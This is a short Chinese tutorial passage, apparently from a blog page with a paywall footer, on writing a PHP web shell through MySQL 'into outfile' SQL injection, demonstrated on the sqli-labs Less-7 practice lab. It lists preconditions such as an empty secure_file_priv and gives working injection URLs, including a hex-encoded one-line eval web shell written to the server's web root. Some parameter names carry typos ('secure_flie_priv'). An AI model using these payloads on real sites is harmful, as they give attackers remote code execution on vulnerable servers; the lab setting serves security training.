into outfile
条件:
web目录具有写的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空
以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出
show global variables like '%secure%';
在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可
id=1' and 1=2 union select 1,2,'shell内容' into outfile "绝对路径\shell.php" %23
eg: http://192.168.52.183/sqli-labs/Less-7/?id=-3')) union select 1,0x3c3f706870206576616c28245f524551554553545b27696b756e275d293b3f3e20,3 into outfile 'C:\\phpstudy_pro\\WWW\\outfile.php' --+这里进行16进制转换,因此是0X开头,写入“<?php eval($_REQUEST['ikun']);?> ” ,到相应路径,这里还要双斜杠转义:C:\phpstudy_pro\WWW\outfile.php,然后访问这个:outfile.php 路径
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
